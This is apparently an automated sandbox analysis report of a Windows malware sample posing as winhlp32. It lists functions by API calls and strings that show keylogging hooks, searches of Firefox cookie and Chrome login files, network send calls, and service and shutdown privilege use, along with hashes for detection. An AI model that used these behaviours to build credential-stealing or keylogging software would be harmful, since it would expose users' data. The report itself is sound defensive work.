                                    Function 00452610 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                                    • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                                    • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                    • String ID: lJD$lJD$lJD
                                    • API String ID: 745075371-479184356
                                    • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                    • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                    • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                    • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040C34D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                                    • FindClose.KERNEL32(00000000), ref: 0040C47D
                                    • FindClose.KERNEL32(00000000), ref: 0040C4A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFile$FirstNext
                                    • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                    • API String ID: 1164774033-405221262
                                    • Opcode ID: 285c5e5c0a0229c45b09239667504c56f02977e4a07d16255c72b533a04b213f
                                    • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                                    • Opcode Fuzzy Hash: 285c5e5c0a0229c45b09239667504c56f02977e4a07d16255c72b533a04b213f
                                    • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041C291 Relevance: 13.6, APIs: 9, Instructions: 106fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                    • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
                                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                    • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                    • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                    • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                    • String ID:
                                    • API String ID: 2341273852-0
                                    • Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                    • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                    • Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                    • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00419AF5 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                    • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Find$CreateFirstNext
                                    • String ID: 8SG$PXG$PXG$NG$PG
                                    • API String ID: 341183262-3812160132
                                    • Opcode ID: 5ecfd420887d4aa0419a0cdf88a2b9ef7083ad6ab133fa1393ed96766f74d972
                                    • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                    • Opcode Fuzzy Hash: 5ecfd420887d4aa0419a0cdf88a2b9ef7083ad6ab133fa1393ed96766f74d972
                                    • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                    • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                    • GetLastError.KERNEL32 ref: 0040A2ED
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                    • TranslateMessage.USER32(?), ref: 0040A34A
                                    • DispatchMessageA.USER32(?), ref: 0040A355
                                    Strings
                                    • Keylogger initialization failure: error , xrefs: 0040A301
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                    • String ID: Keylogger initialization failure: error
                                    • API String ID: 3219506041-952744263
                                    • Opcode ID: a0c7fd995aca5085690907e56c9aea0f8c761d2d3ede884cf20f0c391cb5f383
                                    • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                    • Opcode Fuzzy Hash: a0c7fd995aca5085690907e56c9aea0f8c761d2d3ede884cf20f0c391cb5f383
                                    • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetForegroundWindow.USER32 ref: 0040A416
                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                    • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                    • GetKeyState.USER32(00000010), ref: 0040A433
                                    • GetKeyboardState.USER32(?), ref: 0040A43E
                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                    • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                    • String ID:
                                    • API String ID: 1888522110-0
                                    • Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                    • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                    • Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                    • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00413FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                                    • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCloseCreateLibraryLoadProcsend
                                    • String ID: SHDeleteKeyW$Shlwapi.dll
                                    • API String ID: 2127411465-314212984
                                    • Opcode ID: ec507b0493fd4fd584cfcadeaf977d3343d777ca479f652cc31a06200245f1e9
                                    • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                                    • Opcode Fuzzy Hash: ec507b0493fd4fd584cfcadeaf977d3343d777ca479f652cc31a06200245f1e9
                                    • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00449190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 00449212
                                    • _free.LIBCMT ref: 00449236
                                    • _free.LIBCMT ref: 004493BD
                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                    • _free.LIBCMT ref: 00449589
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                    • String ID:
                                    • API String ID: 314583886-0
                                    • Opcode ID: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
                                    • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                                    • Opcode Fuzzy Hash: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
                                    • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                      • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                      • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                      • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                      • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                    • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                    • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                                    • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                    • String ID: !D@$PowrProf.dll$SetSuspendState
                                    • API String ID: 1589313981-2876530381
                                    • Opcode ID: cf382c4b4b58b3ccdbeb602cd597e3aae52b34eb44ac0b5ef7fae28ca1f23560
                                    • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                    • Opcode Fuzzy Hash: cf382c4b4b58b3ccdbeb602cd597e3aae52b34eb44ac0b5ef7fae28ca1f23560
                                    • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0045243C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                    • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                    • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale
                                    • String ID: ACP$OCP$['E
                                    • API String ID: 2299586839-2532616801
                                    • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                    • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                    • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                    • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                    • GetLastError.KERNEL32 ref: 0040BA58
                                    Strings
                                    • [Chrome StoredLogins not found], xrefs: 0040BA72
                                    • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                    • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                    • UserProfile, xrefs: 0040BA1E
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteErrorFileLast
                                    • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    • API String ID: 2018770650-1062637481
                                    • Opcode ID: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
                                    • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                    • Opcode Fuzzy Hash: 0869f95c927aca72a4aa01e0263511fc677d69a40d3c9f55f6e6efd0e01f34cf
                                    • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                    • GetLastError.KERNEL32 ref: 0041799D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                    • String ID: SeShutdownPrivilege
                                    • API String ID: 3534403312-3733053543
                                    • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                    • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                    • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                    • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00409258
                                      • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                    • FindClose.KERNEL32(00000000), ref: 004093C1
                                      • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                      • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                      • Part of subcall function 00404E26: CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                    • FindClose.KERNEL32(00000000), ref: 004095B9
                                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                    • String ID:
                                    • API String ID: 1824512719-0
                                    • Opcode ID: a6751bec5fce5d81251b9b736bf08cf26c1fafd63ddf946bc12b4f105cc54f1c
                                    • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                    • Opcode Fuzzy Hash: a6751bec5fce5d81251b9b736bf08cf26c1fafd63ddf946bc12b4f105cc54f1c
                                    • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                    • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                    • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ManagerStart
                                    • String ID:
                                    • API String ID: 276877138-0
                                    • Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                    • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                    • Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                    • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00451CD8 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                                    • _wcschr.LIBVCRUNTIME ref: 00451E4A
                                    • _wcschr.LIBVCRUNTIME ref: 00451E58
                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                    • String ID: sJD
                                    • API String ID: 4212172061-3536923933
                                    • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                    • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                                    • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                                    • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                    Download Yara Rule
                                    APIs
                                    • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                                    • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                    • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                    • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Resource$FindLoadLockSizeof
                                    • String ID: SETTINGS
                                    • API String ID: 3473537107-594951305
                                    • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                    • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                    • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                    • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 0040966A
                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                    • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Find$File$CloseFirstH_prologNext
                                    • String ID:
                                    • API String ID: 1157919129-0
                                    • Opcode ID: 0486a3e5323fa754227002c4bfd4b9cac3373fa35fae64e05d413ef310d72826
                                    • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                    • Opcode Fuzzy Hash: 0486a3e5323fa754227002c4bfd4b9cac3373fa35fae64e05d413ef310d72826
                                    • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00408811
                                    • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
